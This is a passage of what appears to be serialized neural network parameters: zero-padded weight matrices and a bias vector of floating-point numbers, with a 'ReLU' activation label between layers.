0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06235, -0.1771, -0.4048, 0.02953, -0.0704, 0.02348, -0.341, -0.07635, 0.03183, 0.0936, -0.09283, -0.03494, -0.1693, -0.0699, 0.4768, -0.0829, 0.2283, -0.03912, 0.1783, 0.002232, -0.258, 0.2986, 0.1572, -0.1565, 0.2795, 0.273, 0.06128, -0.215, -0.2106, 0.0834, 0.1835, -0.0362, 0.2245, 0.139, 0.0745, 0.289, -0.07654, 0.487, -0.06915, -0.2625, -0.2252, 0.1799, -0.1659, -0.1398, -0.3384, 0.3235, 0.1224, -0.02782, -0.08105, -0.2925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5083, -0.12427, -0.08673, 0.3545, -1.093, 0.0197, -0.1345, -0.501, -0.2151, 0.1227, -0.3162, -0.387, 0.1091, -0.2318, -1.024, 0.0752, 0.2524, -0.0811, 0.06, 0.02873, -0.0669, -0.3394, -0.02106, 0.2717, 0.0752, 0.03534, 0.344, -0.1808, -0.0716, 0.2385, 0.1613, -0.0657, -0.5767, -0.09656, -0.52, -0.09247, 0.4207, 0.0809, -0.2666, 0.02727, -0.2998, -0.4827, 0.02841, 0.1824, 0.4094, 0.2625, -0.335, 0.00815, -0.4446, -0.2969], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2822, -0.05695, 0.0528, 0.3826, 0.5264, -0.1553, -0.2025, 0.414, 0.1462, -0.01262, -1.091, -0.4712, -0.11237, 0.1321, 0.134, -0.413, 0.1216, 0.365, -0.2385, -0.04727, 0.4705, -0.1049, -0.028, -0.136, -0.1385, -0.4463, 0.2007, -0.4153, 0.12, -0.2404, -0.6367, -0.84, -0.7773, -0.5767, 0.1653, -0.281, 0.4275, -1.889, 0.0778, -0.01628, 0.1587, 0.373, -0.4363, 0.5674, 0.4893, -0.4214, -0.1373, 0.02211, 0.1333, -0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3662, -0.10394, -0.346, 0.52, -0.2303, 0.298, -0.6865, -0.4148, -0.2693, 0.3613, 1.407, -0.5664, -0.07275, 0.7666, -0.035, 0.322, 0.764, 0.72, -0.4507, 0.03035, 0.533, -0.501, -0.3574, -1.102, -0.00983, 0.3342, 0.3218, 0.536, -0.2595, -0.5293, -0.56, -0.02911, -0.338, -0.4553, -0.182, 0.04385, 0.787, -1.411, 0.10876, 1.212, -2.2, -0.2007, 0.523, -0.06168, 0.187, -0.08936, 0.5317, -0.04425, 0.2001, -0.5464], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5205, -0.1768, 0.2542, -0.3264, 0.247, 0.3013, -0.1458, -0.3745, 0.2025, -0.1724, -0.1683, -0.3633, 0.0628, 0.0953, 0.7373, -0.694, 0.2632, -0.02344, 0.1599, 0.02702, 0.2372, 0.545, -0.266, -0.3574, 0.00818, -0.314, -0.10315, -0.0811, -0.308, -0.3467, 0.6934, 0.698, -0.1545, 0.0876, -0.02422, 0.602, -0.589, 0.282, -0.08435, 0.282, -0.3281, -0.1265, 0.1881, -0.03674, -0.2374, 0.1641, -0.05115, -0.01817, -0.1824, 0.5356], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02794, -0.06107, -0.01014, -0.0553, 0.04044, -0.05737, 0.00621, -0.002224, 0.02385, -0.01482, 0.001553, -0.03674, 0.01628, 0.0212, 0.00491, 0.0047, 0.04245, -0.02415, -0.006554, 0.02823, -0.05463, -0.03186, -0.02824, -0.03244, 0.013, -0.02002, 0.01854, -0.01121, -0.03348, -0.01317, -0.01732, 0.01502, -0.03912, 0.01727, 0.00879, 0.0264, -0.00261, -0.01248, 0.01091, -0.05478, -0.05338, -0.0669, -0.03836, 0.02444, -0.003244, -0.007027, -0.04507, 0.0307, 0.010925, 0.02257], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1245, -0.1144, -0.2134, 1.413, -0.6733, -0.2333, 0.3706, -0.3145, 0.594, -0.2556, -0.3154, 0.316, -0.1747, -0.05594, -0.03595, 0.529, -0.0337, 0.5635, -0.1886, 0.03333, 0.01511, 0.00196, -0.0565, -0.2347, 0.704, 0.4321, 0.2157, 0.3103, -0.4512, -0.1528, 0.408, 0.8345, 0.3967, 0.106, -0.449, 0.386, -0.1864, -0.4941, 0.0412, 0.5435, -0.282, -0.2338, -0.1598, 0.3455, 0.6294, 0.09094, 0.263, -0.01405, 0.0704, 0.08704], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0863, 0.2147, -0.2051, -0.51, -0.283, -0.3354, -0.002817, -0.0388, 0.3606, -0.1611, 0.1615, 0.1688, -0.3867, 0.4895, -0.1437, -0.0548, -0.823, 0.04572, 0.338, -0.00916, -0.02457, 0.311, 0.1586, 0.0589, 0.02913, 0.649, -0.08923, -0.006878, -0.2166, -0.3594, -0.2041, 0.873, -0.1549, -0.2444, 0.0871, -0.252, 0.2416, -0.6367, -0.4192, -0.0852, -0.02736, -0.2454, 0.315, -0.3962, -0.1722, -0.705, 0.488, 0.02197, -0.0403, 0.199]]
[1.48416, -0.0392727, -0.0907838, -2.47397, -2.26864, 0.289911, 0.0849784, -0.0216935, -0.688173, -0.245358, -0.408883, 0.345316, -1.17538, -0.129693, -0.0153813, 2.30298, 0.472199, -0.466609, -1.12351, 0.495937, -0.570643, -0.788515, 1.01652, 0.462602, -1.62913, -0.584215, 0.124253, -0.0774607, 0.288896, -1.92722, -1.86128, 0.507499, 2.08643, -0.100975, 0.302989, -0.800885, -0.166501, 0.224915, -0.31377, -0.0885139, -0.0413228, -0.688478, 0.0999729, 0.235693, 0.200208, 0.185322, 0.213242, -0.0363364, 0.0762837, -0.216393, 1.484, -0.03928, -0.09076, -2.475, -2.27, 0.2898, 0.08496, -0.0217, -0.688, -0.2454, -0.409, 0.3452, -1.176, -0.1296, -0.01538, 2.303, 0.4722, -0.4666, -1.123, 0.4958, -0.571, -0.7886, 1.017, 0.4626, -1.629, -0.584, 0.12427, -0.07745, 0.2888, -1.927, -1.861, 0.5073, 2.086, -0.10095, 0.303, -0.801, -0.1665, 0.225, -0.3137, -0.0885, -0.04132, -0.6885, 0.1, 0.2357, 0.2002, 0.1853, 0.2133, -0.03635, 0.0763, -0.2164]
ReLU
[[-0.169473, -1.03007, 0.593824, -0.338295, 0.209267, 0.217493, 0.282646, 0.16408, 0.847151, -0.709383, 0.355731, 0.00851368, 0.230222, 0.61313, -0.00210447, -0.0725392, 0.129506, -0.163513, -0.0985782, -0.605079, -0.135279, -0.452584, 0.446829, -0.441123, -0.0297429, 0.203976, 0.0839317, -0.535231, 0.732104, -1.1308, -0.1063, 0.165051, -0.00495938, -0.205156, 0.0252767, -0.509672, -0.117627, -0.0121789, 0.0852722, -0.839977, 0.177017, 0.591938, -0.445001, 0.726944, 0.473024, -0.578123, 0.0935903, -0.0158796, 0.271254, 0.660591, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.143577, 0.157256, 2.10021, 0.291818, -0.646289, -0.204413, 1.70395, -0.0909241, 2.71345, -0.373817, 0.777598, -0.0737466, 0.347773, -0.278903, 0.0362949, -0.20527, -2.19531, -0.436689, 1.33267, 0.479349, -2.02983, -0.59832, -0.293505, -0.359685, -2.78916, -2.06597, -0.586336, -0.388229, -0.160516, -5.22225, -0.0544925, 0.0294967, -0.0245091, -0.917015, 0.531314, 0.631571, 2.12404, 0.776355, 0.336582, 0.899602, 1.06138, 1.10148, 1.5414, 2.05923, 1.53419, -0.175343, 0.0965602, -0.00813101, -0.193434, -0.996148, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00119997, -0.254742, 0.202776, -0.0314264, -0.140569, 0.490016, -0.11169, 0.516098, 0.163042, 0.316937, -0.210767, -0.157627, -0.094456, -0.340132, 0.031363, 0.044025, 0.0542488, 0.0655882, 0.414036, -0.171993, -0.124623, 0.0786032, -0.0973331, 0.061418, -0.182836, -0.258007, -0.0953505, -0.0712494, 0.275942, -5.66053, -2.60924, 0.0726355, -0.0692279, -0.102569, 0.115596, -0.212374, -0.366205, -0.00909374, -0.133603, -0.111884, 
0.0470368, 0.223978, -0.13348, 0.156666, 0.400056, 0.0484032, -0.305145, 0.00205837, -0.194817, -0.719632, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.512819, -1.55515, 3.80889, -0.669636, -0.595168, -3.35302, -0.951652, -2.33358, 6.1563, 0.0125516, 0.623092, -1.90052, 0.638503, -3.33116, -0.0312064, -0.324169, -2.49058, 0.861782, -1.33819, -4.22818, -0.847625, -0.105883, -0.33, 1.77039, 2.70489, 1.43031, -1.20832, -0.231104, -1.13776, 9.4714, -0.671943, 0.00446878, -0.137839, -0.593724, -0.422652, -1.76687, 1.65993, 0.755269, 2.10153, -1.27609, 1.58772, -2.78202, 0.361769, -2.00126, -0.778894, 1.23621, 0.788718, 0.0386314, -0.203662, -2.71628, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.15628, 0.112975, -2.696, -0.0929159, -0.114286, -2.39392, -0.0321934, 0.352787, -0.221858, -0.0208618, -0.393997, -0.0992529, 0.0912523, -0.21713, -0.0167364, -0.199261, -0.0310063, 0.16779, 0.0299587, 0.282117, -0.886747, -0.0472178, 0.0112031, 0.726206, 0.185312, 0.119465, 0.0112261, -0.0960156, 0.219136, 0.321126, -0.0608714, -0.359181, 0.100634, -0.171019, 0.0121608, 0.329051, -1.37075, 0.506645, 0.0218327, 0.347524, -0.366647, 0.184254, -0.0986234, -0.114808, -0.341026, -0.412896, -4.21376, 0.0282555, 0.362087, -2.27503, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.018116, -0.688114, 0.355782, -0.158535, 0.0326831, -0.704587, -0.0746711, -0.187797, 0.318406, 
-0.469804, 0.0289892, -0.194649, 0.3991, 0.178563, -0.0123404, 0.0823342, 0.118463, -0.59833, -0.0358356, 0.035818, 0.243321, -0.433698, 0.448077, -0.0485438, -0.156686, 0.104779, 0.141928, -0.178951, 0.623091, -0.371928, 0.16347, -0.0922999, -0.0567132, -0.0821873, 0.0328512, -0.50144, 0.203289, -0.096286, 0.0573721, -1.55016, 0.257796, 0.225554, -0.201173, 0.364526, -0.00998764, -0.985847, 0.0182788, -0.023686, -0.0723469, 0.447116, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.74015, -0.397148, 1.79801, 0.0996511, -0.142658, -0.547512, 0.0200878, 0.394112, 0.236619, -0.011665, 0.0521026, -0.452225, -0.821851, -0.00759356, 0.00402091, -0.0667074, -0.00424326, 0.208753, -0.0234869, 0.0768873, -0.13006, -0.00989095, 0.0485464, 0.0471453, 0.920901, 0.00489362, 0.0218371, 0.0406351, -0.245331, 2.54714, -0.0127445, 1.20106, -0.375378, -0.104825, -0.071136, -0.391505, 0.309504, 0.0963099, -0.507734, 0.536791, 0.0606857, 0.0346801, 0.732768, -0.126133, -0.133468, -0.0754325, 0.376699, -0.00777351, 0.225494, -0.734792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.03088, -0.155727, -0.248909, -0.185697, 0.402917, -0.0390676, -0.281417, 0.68385, 1.05825, -0.579026, 0.218483, -0.24237, 0.980957, -0.77596, -0.0127888, 0.18933, -0.623748, -0.717682, -0.606729, 2.17902, -0.101283, -0.606275, 0.736636, -0.391787, 0.727771, -0.587775, -0.834278, -0.473717, 0.251169, 2.23663, 0.579148, 0.588325, 0.350588, -0.864033, 0.37841, -0.929261, 0.0985265, 0.026859, -0.109312, -2.03724, -0.210657, 0.346805, -0.120065, -1.0487, 0.27648, -1.70485, 0.0619824, -0.0170093, -0.0337802, 
0.453055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.134509, -1.45003, 0.292652, -0.187551, -0.0231918, -4.8773, -0.16623, -0.832317, 0.629619, -0.214393, -2.32775, 0.00882944, 0.508135, -0.207935, 0.00673275, -0.298272, 0.151668, 0.0384905, -0.0148084, 0.522095, 0.0346454, 0.0872506, -0.294643, 0.566773, 1.13618, 0.211747, -0.418215, 0.428726, -0.329257, 2.60937, -1.1289, -0.44999, -0.764455, -0.00265432, -0.032117, 1.38089, -2.4579, 0.0615875, -0.774395, -0.666606, 0.395994, 0.170767, -0.203539, 0.0846183, 0.478258, 0.0936237, 0.0213258, 0.0103008, 0.57572, -0.044792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.221371, -0.462056, -1.04637, -0.0847253, -0.0863158, -0.66562, 0.00810122, -0.0475918, 1.67965, -0.0880703, 0.276837, -0.305258, -0.106463, -0.0209559, -0.0221157, -0.0392417, 0.0156593, -0.0883511, -0.265426, 0.495479, 0.0158834, -0.0313959, 0.00189376, 0.201395, 0.427881, 0.000952049, -0.0326239, -0.0328697, -0.311255, 0.835929, 0.0384777, 0.146877, -0.274332, -0.0561148, 0.110098, 0.393372, -0.397495, -0.290429, 0.128022, -0.848171, -0.153973, 0.0874094, 0.163239, -0.0560784, 0.195893, 0.0780177, 0.25038, -0.0238414, 0.0883915, -0.060578, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.38376, 0.20059, -0.16424, -0.121489, 0.00473864, -0.725031, 0.0675223, -0.189969, -0.0637548, 0.156876, 0.0125627, 0.467099, 0.149763, 0.0536317, 
-0.0170047, -0.0708157, 0.0957326, 0.0232962, 0.403031, -0.27095, 0.0337353, 0.146962, -0.0240061, 0.164953, -0.608584, 0.211669, 0.563962, 0.0669437, 0.394516, -0.128171, -0.144911, -0.205429, -0.0609732, 0.0378101, 0.0804393, 0.3316, -0.446167, -0.160952, 0.0677892, 0.206843, -0.036053, 0.0200441, -0.443373, 0.151166, 0.0418186, 0.165992, -0.449106, -0.0391579, -0.0147807, 0.0480222, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.404076, -0.0419424, 1.41769, -0.765138, -2.32233, 0.611769, 1.07246, 0.653312, 0.166853, -0.486954, -0.323731, -0.5293, -0.165618, 0.000804496, 0.0333297, -0.125676, -0.634638, -0.371691, 0.264503, 0.683032, -0.227846, 0.115096, -0.0450159, 0.223376, 0.650941, 0.128426, -0.0337287, -0.58971, 0.332945, -1.6172, 0.653333, -0.0253915, 0.13049, -0.39881, -0.0889884, 0.176723, 0.28311, -0.0912782, -0.291117, -1.1341, 0.0394494, 0.187399, 1.29316, -1.28824, -0.912278, 0.394143, 0.793827, -0.0290338, 0.391215, 0.176, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.2586, 0.953439, 0.358845, -0.128209, -0.192998, -1.1001, 0.670785, -1.44927, -0.448864, 0.111651, 0.421026, 1.45395, -0.292067, -1.47263, 0.00661507, -0.112594, -0.669622, 0.105545, -0.424528, 1.98016, -1.36578, -3.41133, 0.388779, 0.355398, 0.352509, -0.765559, 0.517842, -0.0589605, -0.544098, 0.0806625, 0.346438, 0.421414, -0.132525, -1.23272, -1.3066, -0.213365, 0.727457, 0.0965079, -1.14517, 2.12791, 0.909574, 0.776518, 1.3762, -0.399836, 0.236509, -0.0448613, 0.925439, -0.0096885, 0.0980403, -3.74682, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.144398, 0.944435, -6.52346, -0.140787, -0.771333, 0.361272, -0.329932, -1.09612, -3.53029, -1.62412, 5.4805, -0.491052, 0.160924, -1.33929, -0.0361681, 0.308141, -0.388448, -4.44593, -0.0815642, 2.5366, -1.54709, 0.912508, -0.251726, 3.07993, -2.83219, -5.13012, 1.78755, -0.780049, 3.4665, 0.122828, 0.789207, -1.20975, -0.426088, 0.296093, 0.223132, -1.07246, -2.48551, 2.04708, 0.940531, 0.419219, -2.83906, 3.34849, 0.8725, -5.29062, 2.4045, -0.964443, -8.39952, -0.0394036, -4.03658, -3.31629, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.216987, 0.431716, 0.101036, 0.676643, -0.239259, -0.644002, 0.45217, 0.149218, 0.575255, 0.539549, -1.14147, -0.0388974, 0.417126, -2.5186, 0.0329096, -0.129417, -6.19952, 0.556412, -3.08438, -0.474449, -0.578393, -0.0792406, -1.55042, 0.805285, -0.348269, -0.567471, 0.0119641, -0.0991636, -1.73113, 1.9284, -0.225436, -0.164566, -0.087291, -0.201831, -0.0596637, 0.419267, -0.324364, 0.783502, -0.17094, -0.146647, 0.315248, -0.192383, 0.449949, -1.28941, -1.84316, 0.323579, 0.0854937, 0.0301617, 0.255968, -2.36518, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0651774, 0.131578, 0.455438, -0.238157, -0.165716, 0.589775, 0.165163, 0.224065, -0.0583999, -0.145891, -0.174407, -0.213818, -0.0859563, -0.0652727, -0.00376936, -0.0917978, -0.0688946, 0.0341639, -0.15266, 0.477196, 0.0837651, 0.0367946, -0.0726499, 0.0753374, 0.171091, 0.00549605, 
-0.233555, -0.119967, -0.068452, -12.8383, -0.880406, -0.163688, 0.039351, -0.181738, -0.081696, -0.255844, -0.21875, -0.296748, 0.227985, -0.389049, 0.0387661, 0.155939, -0.111301, 0.0886789, 0.0900578, 0.00227072, 0.0350527, 0.0260911, 0.382048, 0.22435, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.467969, -0.28572, -1.41029, -1.45105, -5.93991, 1.38801, -0.731097, 0.883655, -0.818314, -0.25131, 1.52338, -0.853826, 0.249576, -0.0978616, 0.0163493, -0.0591605, 0.0208357, -3.03835, -0.00947109, 1.32725, -1.9915, -0.385439, -0.0109491, -0.66593, -1.02611, 0.0677868, -0.255052, -0.208263, 0.569563, 0.0505852, 0.0718921, 0.202451, -0.138924, -0.339872, 0.087764, 0.545014, -1.29585, -0.759556, -0.797292, -1.09192, -1.32351, 0.953724, -0.325783, 1.35595, 0.649024, -2.72836, 0.577709, -0.0358155, 0.57044, -0.385399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.282938, 1.68018, 1.07629, -0.620943, 0.0434746, 0.296723, 1.2045, -0.244555, 0.968058, -0.126185, 1.0286, 0.749134, -1.60557, -0.315543, -0.0312326, -0.139754, 0.117409, 0.136566, 0.0986693, 1.65825, 0.371837, -0.351298, -0.0299128, -0.22872, -0.407847, 0.0792935, -0.19151, -0.341003, 0.776699, 0.792872, -1.12557, 0.286089, -0.659899, 0.199452, 0.112973, -0.500828, -0.481456, 1.09779, 0.0178231, 0.437044, -0.0393423, -0.221312, 0.565016, -0.069832, -0.174937, 0.214048, 0.346389, -0.046224, -0.373601, -0.378589, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
